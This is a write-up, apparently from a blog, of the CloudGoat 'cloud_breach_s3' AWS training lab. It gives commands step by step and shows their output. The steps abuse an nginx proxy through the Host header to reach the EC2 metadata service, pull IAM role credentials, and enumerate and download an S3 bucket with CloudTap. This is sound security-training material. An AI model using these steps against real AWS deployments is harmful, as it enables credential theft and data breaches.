CloudGoat-Cloud_Breach_S3

,

Cloud Breach S3 - CloudGoat Walkthrough

This walkthrough demonstrates a complete penetration test of the CloudGoat “cloud_breach_s3” scenario, showcasing how attackers can exploit misconfigured AWS EC2 instances to access sensitive S3 data. The scenario involves exploiting an EC2 metadata service proxy to retrieve IAM credentials and subsequently accessing restricted S3 buckets containing sensitive information. This CloudGoat walkthrough covers essential AWS security concepts including EC2 metadata service abuse, IAM credential extraction, and S3 bucket enumeration using automated tools like CloudTap.

Initial Setup

Starting CloudGoat, first we should whitelist our IP:

1
cloudgoat config whitelist --auto

Then run the following command to create the scenario:

1
cloudgoat create cloud_breach_s3

We get our initial information:

1
2
cloudgoat_output_aws_account_id = 065855168369
cloudgoat_output_target_ec2_server_ip = 54.224.25.16

Reconnaissance Phase

Let’s start scanning the machine and see what ports are open:

1
nmap -Pn -sC -sV --top-ports=1000 54.224.25.16
1
2
3
4
5
6
7
8
9
10
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 30:20:b0:04:5a:56:28:9f:91:04:ad:3d:37:9f:64:77 (RSA)
|   256 ee:41:41:e5:55:9e:d9:39:fa:5b:53:b0:91:5f:ba:88 (ECDSA)
|_  256 d2:72:c2:f7:4b:1e:ca:05:16:96:3f:58:8d:ba:49:c6 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (application/octet-stream).
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two ports open 22 and 80. Let’s see what’s hosted on port 80 first:

1
curl http://54.224.25.16/
1
<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>

Exploiting the EC2 Metadata Service

The AWS EC2 metadata service is accessible via http://169.254.169.254/latest/meta-data/.
Our goal is to abuse the proxy to retrieve metadata — possibly credentials or a flag stored in a user data script or IAM role credentials.

1
curl -H "Host: 169.254.169.254" http://54.224.25.16/latest/meta-data/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
...

Now we can access the IAM folder and find the stored credentials:

1
curl -H "Host: 169.254.169.254" http://54.224.25.16/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cgid1w9fw6k41a
1
2
3
4
5
6
7
8
9
{
  "Code" : "Success",
  "LastUpdated" : "2025-06-02T09:47:46Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAQ6VK#########",
  "SecretAccessKey" : "vGwJXq/#######################",
  "Token" : "IQoJb3JpZ2luX2VjECIaCXVzLWVhc3QtMSJIMEYCIQDnHxLZZg2tjMuc1oMRPE5kEbDx1fSXkdgj10uIAdNIZQIhAJNEadIM5+DJO0NlSYWxKOHhlz6TBzFEU9un5lC5Jy9mKsQFCOv//////////wEQABoMMDY1ODU1MTY4MzY5IgxedGWksHmqogwnwUkqmAWHWHPsZcUKi5u0H5qmE46MBnVourgix480tzyAEv1EfaKIbsNzdkyaTsYYzL++JUCN0agA0OE9nhmqAnQ41axHY0twbEKS0HMQhEzM/+47qvnGbvogAChpZkZrXmN1Kdz+l45LpovVvykejrdWgwQC1LPYUNQSYdWBrnbFpPmXEWV2N6WjZJyNT0AeNFiSRz5ROcFQw1BQsMF1j1dhDLDu6BbINBZpdIV4Ef7ggDYvY2J3q1K+pFXOcnR+0aHOiFi6UlPYnOTpQXVMBH4+I9WaCmX90+xN/W3b0gGhdnLPUy1LO#############################",
  "Expiration" : "2025-06-02T16:22:23Z"
}

AWS Configuration and Enumeration

First we need to configure the credentials and the aws_session_token:

1
aws configure --profile init
1
aws configure set aws_session_token "<TOKEN>" --profile init

Using CloudTap for Advanced Enumeration

I will be using CloudTap to enumerate all of the permissions the user we obtained has. CloudTap is a powerful AWS enumeration tool that automatically discovers and exploits AWS permissions, making it invaluable for penetration testing and security assessments.

1
python3 CloudTap.py --keys init

S3 Bucket Discovery

The CloudTap tool has found an S3 bucket and automatically downloads it. Inside there is sensitive information about credit card numbers and IP addresses, which marks the end of this engagement.

Conclusion

This CloudGoat walkthrough demonstrated a complete attack chain from initial reconnaissance to sensitive data exfiltration. The key vulnerabilities exploited were:

  1. Misconfigured EC2 proxy allowing access to metadata service
  2. Exposed IAM credentials through metadata service
  3. Overprivileged S3 access leading to sensitive data exposure

Tools like CloudTap significantly streamline the AWS enumeration process, automatically discovering and exploiting permissions that manual testing might miss. This scenario highlights the critical importance of properly securing EC2 metadata services and implementing least-privilege IAM policies in AWS environments.